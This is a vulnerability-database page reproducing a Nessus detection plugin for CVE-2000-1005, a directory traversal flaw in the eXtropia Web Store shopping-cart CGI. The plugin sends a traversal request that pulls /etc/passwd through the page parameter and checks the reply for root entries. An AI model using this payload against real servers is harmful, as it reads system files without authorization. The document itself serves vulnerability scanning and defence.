Vulners
Lucene search
eXtropia Web Store web_store.cgi Traversal Arbitrary File Access
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
 | CVE-2000-1005 | 22 Jan 200105:00 | – | cve |
 | CVE-2000-1005 | 22 Jan 200105:00 | – | cvelist |
 | EUVD-2000-0992 | 7 Oct 202500:30 | – | euvd |
 | CVE-2000-1005 | 11 Dec 200005:00 | – | nvd |
 | eXtropia Web Store Remote File Retrieval Vulnerability - Active Check | 3 Nov 200500:00 | – | openvas |
| Source | Link |
|---|---|
| seclists | www.seclists.org/bugtraq/2000/Oct/134 |
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#%NASL_MIN_LEVEL 70300
#
# This script was written by Thomas Reinke <[email protected]>
#
# See the Nessus Scripts License for details
#
# Changes by Tenable:
# - Revised plugin titles, output formatting, family change (9/4/09)
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(10532);
script_version("1.34");
script_cve_id("CVE-2000-1005");
script_bugtraq_id(1774);
script_name(english:"eXtropia Web Store web_store.cgi Traversal Arbitrary File Access");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is hosting a CGI script that is affected by an
information disclosure vulnerability." );
script_set_attribute(attribute:"description", value:
"The remote web server is hosting eXtropia WebStore, a shopping cart
application. The installed version allows an attacker to read
arbitrary files via a .. (dot dot) attack on the page parameter." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Oct/134" );
script_set_attribute(attribute:"solution", value:
"There is no solution at this time." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
script_set_attribute(attribute:"plugin_publication_date", value: "2000/10/10");
script_set_attribute(attribute:"vuln_publication_date", value: "2000/10/09");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"eXtropia Web Store remote file retrieval");
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2000-2021 Thomas Reinke");
script_family(english:"CGI abuses");
script_dependencie("find_service1.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80, embedded:TRUE);
if(!get_port_state(port))exit(0);
foreach dir (cgi_dirs())
{
buf = string(dir, "/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html");
buf = http_get(item:buf, port:port);
rep = http_keepalive_send_recv(port:port, data:buf);
if( rep == NULL ) exit(0);
if(egrep(pattern:".*root:.*:0:[01]:.*", string:rep))
security_warning(port);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jan 2021 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 25
EPSS0.06201